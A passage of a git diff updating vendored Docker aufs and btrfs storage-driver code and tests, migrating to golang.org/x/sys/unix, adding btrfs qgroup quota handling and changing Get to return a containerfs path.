"1")); err == nil { - t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p) + t.Fatalf("Error should not be nil because dirs with id 1 should be deleted: %s", p) + } + if _, err := os.Stat(path.Join(tmp, p, "1-removing")); err == nil { + t.Fatalf("Error should not be nil because dirs with id 1-removing should be deleted: %s", p) } } } @@ -165,7 +179,7 @@ func TestGetWithoutParent(t *testing.T) { t.Fatal(err) } expected := path.Join(tmp, "diff", "1") - if diffPath != expected { + if diffPath.Path() != expected { t.Fatalf("Expected path %s got %s", expected, diffPath) } } @@ -174,9 +188,8 @@ func TestCleanupWithNoDirs(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) - if err := d.Cleanup(); err != nil { - t.Fatal(err) - } + err := d.Cleanup() + assert.Check(t, err) } func TestCleanupWithDir(t *testing.T) { @@ -196,45 +209,30 @@ func TestMountedFalseResponse(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) - if err := d.Create("1", "", nil); err != nil { - t.Fatal(err) - } + err := d.Create("1", "", nil) + assert.NilError(t, err) response, err := d.mounted(d.getDiffPath("1")) - if err != nil { - t.Fatal(err) - } - - if response != false { - t.Fatalf("Response if dir id 1 is mounted should be false") - } + assert.NilError(t, err) + assert.Check(t, !response) } -func TestMountedTrueReponse(t *testing.T) { +func TestMountedTrueResponse(t *testing.T) { d := newDriver(t) defer os.RemoveAll(tmp) defer d.Cleanup() - if err := d.Create("1", "", nil); err != nil { - t.Fatal(err) - } - if err := d.Create("2", "1", nil); err != nil { - t.Fatal(err) - } + err := d.Create("1", "", nil) + assert.NilError(t, err) + err = d.Create("2", "1", nil) + assert.NilError(t, err) - _, err := d.Get("2", "") - if err != nil { - t.Fatal(err) - } + _, err = d.Get("2", "") + assert.NilError(t, err) response, err := d.mounted(d.pathCache["2"]) - if err != nil { - t.Fatal(err) - } - - if response != true { - t.Fatalf("Response if dir id 2 is mounted 
should be true") - } + assert.NilError(t, err) + assert.Check(t, response) } func TestMountWithParent(t *testing.T) { @@ -258,13 +256,13 @@ func TestMountWithParent(t *testing.T) { if err != nil { t.Fatal(err) } - if mntPath == "" { - t.Fatal("mntPath should not be empty string") + if mntPath == nil { + t.Fatal("mntPath should not be nil") } expected := path.Join(tmp, "mnt", "2") - if mntPath != expected { - t.Fatalf("Expected %s got %s", expected, mntPath) + if mntPath.Path() != expected { + t.Fatalf("Expected %s got %s", expected, mntPath.Path()) } } @@ -289,8 +287,8 @@ func TestRemoveMountedDir(t *testing.T) { if err != nil { t.Fatal(err) } - if mntPath == "" { - t.Fatal("mntPath should not be empty string") + if mntPath == nil { + t.Fatal("mntPath should not be nil") } mounted, err := d.mounted(d.pathCache["2"]) @@ -299,7 +297,7 @@ func TestRemoveMountedDir(t *testing.T) { } if !mounted { - t.Fatalf("Dir id 2 should be mounted") + t.Fatal("Dir id 2 should be mounted") } if err := d.Remove("2"); err != nil { @@ -312,7 +310,7 @@ func TestCreateWithInvalidParent(t *testing.T) { defer os.RemoveAll(tmp) if err := d.Create("1", "docker", nil); err == nil { - t.Fatalf("Error should not be nil with parent does not exist") + t.Fatal("Error should not be nil with parent does not exist") } } @@ -324,7 +322,7 @@ func TestGetDiff(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -346,7 +344,7 @@ func TestGetDiff(t *testing.T) { t.Fatal(err) } if a == nil { - t.Fatalf("Archive should not be nil") + t.Fatal("Archive should not be nil") } } @@ -368,7 +366,7 @@ func TestChanges(t *testing.T) { } }() - mntPoint, err := d.Get("2", "") + mntPoint, err := driverGet(d, "2", "") if err != nil { t.Fatal(err) } @@ -407,7 +405,7 @@ func TestChanges(t *testing.T) { if err := d.CreateReadWrite("3", "2", nil); err != nil { t.Fatal(err) } - mntPoint, err = d.Get("3", "") + mntPoint, err = driverGet(d, 
"3", "") if err != nil { t.Fatal(err) } @@ -453,7 +451,7 @@ func TestDiffSize(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -495,7 +493,7 @@ func TestChildDiffSize(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -569,9 +567,8 @@ func TestStatus(t *testing.T) { } status := d.Status() - if status == nil || len(status) == 0 { - t.Fatal("Status should not be nil or empty") - } + assert.Check(t, is.Len(status, 4)) + rootDir := status[0] dirs := status[2] if rootDir[0] != "Root Dir" { @@ -597,7 +594,7 @@ func TestApplyDiff(t *testing.T) { t.Fatal(err) } - diffPath, err := d.Get("1", "") + diffPath, err := driverGet(d, "1", "") if err != nil { t.Fatal(err) } @@ -632,7 +629,7 @@ func TestApplyDiff(t *testing.T) { // Ensure that the file is in the mount point for id 3 - mountPoint, err := d.Get("3", "") + mountPoint, err := driverGet(d, "3", "") if err != nil { t.Fatal(err) } @@ -672,48 +669,34 @@ func testMountMoreThan42Layers(t *testing.T, mountPath string) { } current = hash(current) - if err := d.CreateReadWrite(current, parent, nil); err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } - point, err := d.Get(current, "") - if err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + err := d.CreateReadWrite(current, parent, nil) + assert.NilError(t, err, "current layer %d", i) + + point, err := driverGet(d, current, "") + assert.NilError(t, err, "current layer %d", i) + f, err := os.Create(path.Join(point, current)) - if err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + assert.NilError(t, err, "current layer %d", i) f.Close() if i%10 == 0 { - if err := os.Remove(path.Join(point, parent)); err != nil { - t.Logf("Current layer %d", i) - t.Error(err) - } + err := os.Remove(path.Join(point, parent)) + assert.NilError(t, err, "current layer %d", i) 
expected-- } last = current } // Perform the actual mount for the top most image - point, err := d.Get(last, "") - if err != nil { - t.Error(err) - } + point, err := driverGet(d, last, "") + assert.NilError(t, err) files, err := ioutil.ReadDir(point) - if err != nil { - t.Error(err) - } - if len(files) != expected { - t.Errorf("Expected %d got %d", expected, len(files)) - } + assert.NilError(t, err) + assert.Check(t, is.Len(files, expected)) } func TestMountMoreThan42Layers(t *testing.T) { - os.RemoveAll(tmpOuter) + defer os.RemoveAll(tmpOuter) testMountMoreThan42Layers(t, tmp) } @@ -744,10 +727,10 @@ func BenchmarkConcurrentAccess(b *testing.B) { defer os.RemoveAll(tmp) defer d.Cleanup() - numConcurent := 256 + numConcurrent := 256 // create a bunch of ids var ids []string - for i := 0; i < numConcurent; i++ { + for i := 0; i < numConcurrent; i++ { ids = append(ids, stringid.GenerateNonCryptoID()) } @@ -762,7 +745,7 @@ func BenchmarkConcurrentAccess(b *testing.B) { parent := ids[1] ids = append(ids[2:]) - chErr := make(chan error, numConcurent) + chErr := make(chan error, numConcurrent) var outerGroup sync.WaitGroup outerGroup.Add(len(ids)) b.StartTimer() @@ -800,3 +783,23 @@ func BenchmarkConcurrentAccess(b *testing.B) { } } } + +func TestInitStaleCleanup(t *testing.T) { + if err := os.MkdirAll(tmp, 0755); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + for _, d := range []string{"diff", "mnt"} { + if err := os.MkdirAll(filepath.Join(tmp, d, "123-removing"), 0755); err != nil { + t.Fatal(err) + } + } + + testInit(tmp, t) + for _, d := range []string{"diff", "mnt"} { + if _, err := os.Stat(filepath.Join(tmp, d, "123-removing")); err == nil { + t.Fatal("cleanup failed") + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go index d2325fc46c..e60be5e3c9 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go +++ 
b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go @@ -1,6 +1,6 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "bufio" @@ -15,7 +15,7 @@ func loadIds(root string) ([]string, error) { if err != nil { return nil, err } - out := []string{} + var out []string for _, d := range dirs { if !d.IsDir() { out = append(out, d.Name()) @@ -36,7 +36,7 @@ func getParentIDs(root, id string) ([]string, error) { } defer f.Close() - out := []string{} + var out []string s := bufio.NewScanner(f) for s.Scan() { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go index da1e892f44..9f5510380c 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go @@ -1,21 +1,17 @@ // +build linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "os/exec" - "syscall" - "github.com/Sirupsen/logrus" + "golang.org/x/sys/unix" ) // Unmount the target specified. 
func Unmount(target string) error { if err := exec.Command("auplink", target, "flush").Run(); err != nil { - logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err) + logger.WithError(err).Warnf("Couldn't run auplink before unmount %s", target) } - if err := syscall.Unmount(target, 0); err != nil { - return err - } - return nil + return unix.Unmount(target, 0) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go index 8062bae420..8d5ad8f32d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go @@ -1,7 +1,7 @@ -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" -import "syscall" +import "golang.org/x/sys/unix" func mount(source string, target string, fstype string, flags uintptr, data string) error { - return syscall.Mount(source, target, fstype, flags, data) + return unix.Mount(source, target, fstype, flags, data) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go index d030b06637..cf7f58c29e 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import "errors" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go index 44420f11a7..cac6240303 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go @@ -1,6 +1,6 @@ // +build linux -package btrfs +package btrfs // 
import "github.com/docker/docker/daemon/graphdriver/btrfs" /* #include @@ -16,30 +16,31 @@ import "C" import ( "fmt" + "io/ioutil" + "math" "os" "path" "path/filepath" + "strconv" "strings" - "syscall" + "sync" "unsafe" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/system" "github.com/docker/go-units" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func init() { graphdriver.Register("btrfs", Init) } -var ( - quotaEnabled = false - userDiskQuota = false -) - type btrfsOptions struct { minSpace uint64 size uint64 @@ -49,7 +50,16 @@ type btrfsOptions struct { // An error is returned if BTRFS is not supported. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { - fsMagic, err := graphdriver.GetFSMagic(home) + // Perform feature detection on /var/lib/docker/btrfs if it's an existing directory. + // This covers situations where /var/lib/docker/btrfs is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. 
+ testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -62,26 +72,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap if err != nil { return nil, err } - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { - return nil, err - } - - if err := mount.MakePrivate(home); err != nil { + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, err } - opt, err := parseOptions(options) + opt, userDiskQuota, err := parseOptions(options) if err != nil { return nil, err } - if userDiskQuota { - if err := subvolEnableQuota(home); err != nil { - return nil, err - } - quotaEnabled = true - } - driver := &Driver{ home: home, uidMaps: uidMaps, @@ -89,39 +88,48 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap options: opt, } + if userDiskQuota { + if err := driver.subvolEnableQuota(); err != nil { + return nil, err + } + } + return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil } -func parseOptions(opt []string) (btrfsOptions, error) { +func parseOptions(opt []string) (btrfsOptions, bool, error) { var options btrfsOptions + userDiskQuota := false for _, option := range opt { key, val, err := parsers.ParseKeyValueOpt(option) if err != nil { - return options, err + return options, userDiskQuota, err } key = strings.ToLower(key) switch key { case "btrfs.min_space": minSpace, err := units.RAMInBytes(val) if err != nil { - return options, err + return options, userDiskQuota, err } userDiskQuota = true options.minSpace = uint64(minSpace) default: - return options, fmt.Errorf("Unknown option %s", key) + return options, userDiskQuota, fmt.Errorf("Unknown option %s", key) } } - return options, nil + return options, userDiskQuota, nil } // Driver contains information about the filesystem 
mounted. type Driver struct { //root of the file system - home string - uidMaps []idtools.IDMap - gidMaps []idtools.IDMap - options btrfsOptions + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + options btrfsOptions + quotaEnabled bool + once sync.Once } // String prints the name of the driver (btrfs). @@ -150,13 +158,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // Cleanup unmounts the home directory. func (d *Driver) Cleanup() error { - if quotaEnabled { - if err := subvolDisableQuota(d.home); err != nil { - return err - } - } - - return mount.Unmount(d.home) + return d.subvolDisableQuota() } func free(p *C.char) { @@ -196,7 +198,7 @@ func subvolCreate(path, name string) error { args.name[i] = C.char(c) } - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error()) @@ -224,7 +226,7 @@ func subvolSnapshot(src, dest, name string) error { C.set_name_btrfs_ioctl_vol_args_v2(&args, cs) C.free(unsafe.Pointer(cs)) - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error()) @@ -233,8 +235,8 @@ func subvolSnapshot(src, dest, name string) error { } func isSubvolume(p string) (bool, error) { - var bufStat syscall.Stat_t - if err := syscall.Lstat(p, &bufStat); err != nil { + var bufStat unix.Stat_t + if err := unix.Lstat(p, &bufStat); err != nil { return false, err } @@ -242,7 +244,7 @@ func isSubvolume(p string) (bool, error) { return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil } -func subvolDelete(dirpath, name string) error { +func 
subvolDelete(dirpath, name string, quotaEnabled bool) error { dir, err := openDir(dirpath) if err != nil { return err @@ -270,7 +272,7 @@ func subvolDelete(dirpath, name string) error { return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err) } if sv { - if err := subvolDelete(path.Dir(p), f.Name()); err != nil { + if err := subvolDelete(path.Dir(p), f.Name(), quotaEnabled); err != nil { return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err) } } @@ -281,12 +283,27 @@ func subvolDelete(dirpath, name string) error { return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err) } + if quotaEnabled { + if qgroupid, err := subvolLookupQgroup(fullPath); err == nil { + var args C.struct_btrfs_ioctl_qgroup_create_args + args.qgroupid = C.__u64(qgroupid) + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_CREATE, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + logrus.WithField("storage-driver", "btrfs").Errorf("Failed to delete btrfs qgroup %v for %s: %v", qgroupid, fullPath, errno.Error()) + } + } else { + logrus.WithField("storage-driver", "btrfs").Errorf("Failed to lookup btrfs qgroup for %s: %v", fullPath, err.Error()) + } + } + // all subvolumes have been removed // now remove the one originally passed in for i, c := range []byte(name) { args.name[i] = C.char(c) } - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error()) @@ -294,8 +311,27 @@ func subvolDelete(dirpath, name string) error { return nil } -func subvolEnableQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) updateQuotaStatus() { + d.once.Do(func() { + if !d.quotaEnabled { + // In case quotaEnabled is 
not set, check qgroup and update quotaEnabled as needed + if err := subvolQgroupStatus(d.home); err != nil { + // quota is still not enabled + return + } + d.quotaEnabled = true + } + }) +} + +func (d *Driver) subvolEnableQuota() error { + d.updateQuotaStatus() + + if d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } @@ -303,17 +339,25 @@ func subvolEnableQuota(path string) error { var args C.struct_btrfs_ioctl_quota_ctl_args args.cmd = C.BTRFS_QUOTA_CTL_ENABLE - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error()) } + d.quotaEnabled = true + return nil } -func subvolDisableQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) subvolDisableQuota() error { + d.updateQuotaStatus() + + if !d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } @@ -321,24 +365,32 @@ func subvolDisableQuota(path string) error { var args C.struct_btrfs_ioctl_quota_ctl_args args.cmd = C.BTRFS_QUOTA_CTL_DISABLE - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error()) } + d.quotaEnabled = false + return nil } -func subvolRescanQuota(path string) error { - dir, err := openDir(path) +func (d *Driver) subvolRescanQuota() error { + d.updateQuotaStatus() + + if !d.quotaEnabled { + return nil + } + + dir, err := openDir(d.home) if err != nil { return err } defer closeDir(dir) var args C.struct_btrfs_ioctl_quota_rescan_args - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), 
C.BTRFS_IOC_QUOTA_RESCAN_WAIT, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error()) @@ -357,7 +409,7 @@ func subvolLimitQgroup(path string, size uint64) error { var args C.struct_btrfs_ioctl_qgroup_limit_args args.lim.max_referenced = C.__u64(size) args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER - _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT, + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT, uintptr(unsafe.Pointer(&args))) if errno != 0 { return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error()) @@ -366,6 +418,60 @@ func subvolLimitQgroup(path string, size uint64) error { return nil } +// subvolQgroupStatus performs a BTRFS_IOC_TREE_SEARCH on the root path +// with search key of BTRFS_QGROUP_STATUS_KEY. +// In case qgroup is enabled, the retuned key type will match BTRFS_QGROUP_STATUS_KEY. 
+// For more details please see https://github.com/kdave/btrfs-progs/blob/v4.9/qgroup.c#L1035 +func subvolQgroupStatus(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_search_args + args.key.tree_id = C.BTRFS_QUOTA_TREE_OBJECTID + args.key.min_type = C.BTRFS_QGROUP_STATUS_KEY + args.key.max_type = C.BTRFS_QGROUP_STATUS_KEY + args.key.max_objectid = C.__u64(math.MaxUint64) + args.key.max_offset = C.__u64(math.MaxUint64) + args.key.max_transid = C.__u64(math.MaxUint64) + args.key.nr_items = 4096 + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_TREE_SEARCH, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to search qgroup for %s: %v", path, errno.Error()) + } + sh := (*C.struct_btrfs_ioctl_search_header)(unsafe.Pointer(&args.buf)) + if sh._type != C.BTRFS_QGROUP_STATUS_KEY { + return fmt.Errorf("Invalid qgroup search header type for %s: %v", path, sh._type) + } + return nil +} + +func subvolLookupQgroup(path string) (uint64, error) { + dir, err := openDir(path) + if err != nil { + return 0, err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_ino_lookup_args + args.objectid = C.BTRFS_FIRST_FREE_OBJECTID + + _, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_INO_LOOKUP, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return 0, fmt.Errorf("Failed to lookup qgroup for %s: %v", dir, errno.Error()) + } + if args.treeid == 0 { + return 0, fmt.Errorf("Invalid qgroup id for %s: 0", dir) + } + + return uint64(args.treeid), nil +} + func (d *Driver) subvolumesDir() string { return path.Join(d.home, "subvolumes") } @@ -374,6 +480,14 @@ func (d *Driver) subvolumesDirID(id string) string { return path.Join(d.subvolumesDir(), id) } +func (d *Driver) quotasDir() string { + return path.Join(d.home, "quotas") +} + +func (d *Driver) quotasDirID(id string) string { + return path.Join(d.quotasDir(), id) +} 
+ // CreateReadWrite creates a layer that is writable for use as a container // file system. func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { @@ -382,12 +496,13 @@ func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts // Create the filesystem with given id. func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + quotas := path.Join(d.home, "quotas") subvolumes := path.Join(d.home, "subvolumes") rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { return err } - if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(subvolumes, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return err } if parent == "" { @@ -418,9 +533,16 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { if err := d.parseStorageOpt(storageOpt, driver); err != nil { return err } + if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil { return err } + if err := idtools.MkdirAllAndChown(quotas, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(quotas, id), []byte(fmt.Sprint(driver.options.size)), 0644); err != nil { + return err + } } // if we have a remapped root (user namespaces enabled), change the created snapshot @@ -467,19 +589,10 @@ func (d *Driver) setStorageSize(dir string, driver *Driver) error { if d.options.minSpace > 0 && driver.options.size < d.options.minSpace { return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace))) } - - if !quotaEnabled { - if err := subvolEnableQuota(d.home); err != nil { - return err - } - quotaEnabled = true - } - - if err := subvolLimitQgroup(dir, driver.options.size); err != nil { + if err := d.subvolEnableQuota(); err != nil { return err } - - return nil + return subvolLimitQgroup(dir, 
driver.options.size) } // Remove the filesystem with given id. @@ -488,31 +601,51 @@ func (d *Driver) Remove(id string) error { if _, err := os.Stat(dir); err != nil { return err } - if err := subvolDelete(d.subvolumesDir(), id); err != nil { + quotasDir := d.quotasDirID(id) + if _, err := os.Stat(quotasDir); err == nil { + if err := os.Remove(quotasDir); err != nil { + return err + } + } else if !os.IsNotExist(err) { return err } - if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + + // Call updateQuotaStatus() to invoke status update + d.updateQuotaStatus() + + if err := subvolDelete(d.subvolumesDir(), id, d.quotaEnabled); err != nil { return err } - if err := subvolRescanQuota(d.home); err != nil { + if err := system.EnsureRemoveAll(dir); err != nil { return err } - return nil + return d.subvolRescanQuota() } // Get the requested filesystem id. -func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) { dir := d.subvolumesDirID(id) st, err := os.Stat(dir) if err != nil { - return "", err + return nil, err } if !st.IsDir() { - return "", fmt.Errorf("%s: not a directory", dir) + return nil, fmt.Errorf("%s: not a directory", dir) } - return dir, nil + if quota, err := ioutil.ReadFile(d.quotasDirID(id)); err == nil { + if size, err := strconv.ParseUint(string(quota), 10, 64); err == nil && size >= d.options.minSpace { + if err := d.subvolEnableQuota(); err != nil { + return nil, err + } + if err := subvolLimitQgroup(dir, size); err != nil { + return nil, err + } + } + } + + return containerfs.NewLocalContainerFS(dir), nil } // Put is not implemented for BTRFS as there is no cleanup required for the id. 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go index 0038dbcdcd..b70e93bc2d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go @@ -1,6 +1,6 @@ // +build linux -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" import ( "os" @@ -35,12 +35,14 @@ func TestBtrfsSubvolDelete(t *testing.T) { } defer graphtest.PutDriver(t) - dir, err := d.Get("test", "") + dirFS, err := d.Get("test", "") if err != nil { t.Fatal(err) } defer d.Put("test") + dir := dirFS.Path() + if err := subvolCreate(dir, "subvoltest"); err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go index f07088887a..d7793f8794 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go @@ -1,3 +1,3 @@ // +build !linux !cgo -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go index 73d90cdd71..2fb5c73555 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go @@ -1,6 +1,6 @@ // +build linux,!btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" /* #include diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go index f802fbc629..5c755f8177 100644 --- 
a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go @@ -1,6 +1,6 @@ // +build linux,btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" // TODO(vbatts) remove this work-around once supported linux distros are on // btrfs utilities of >= 3.16.1 diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go index 15a6e75cb3..465daadb0d 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go @@ -1,6 +1,6 @@ // +build linux,!btrfs_noversion -package btrfs +package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs" import ( "testing" @@ -8,6 +8,6 @@ import ( func TestLibVersion(t *testing.T) { if btrfsLibVersion() <= 0 { - t.Errorf("expected output from btrfs lib version > 0") + t.Error("expected output from btrfs lib version > 0") } } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go new file mode 100644 index 0000000000..86316fdfe7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go @@ -0,0 +1,277 @@ +// +build linux + 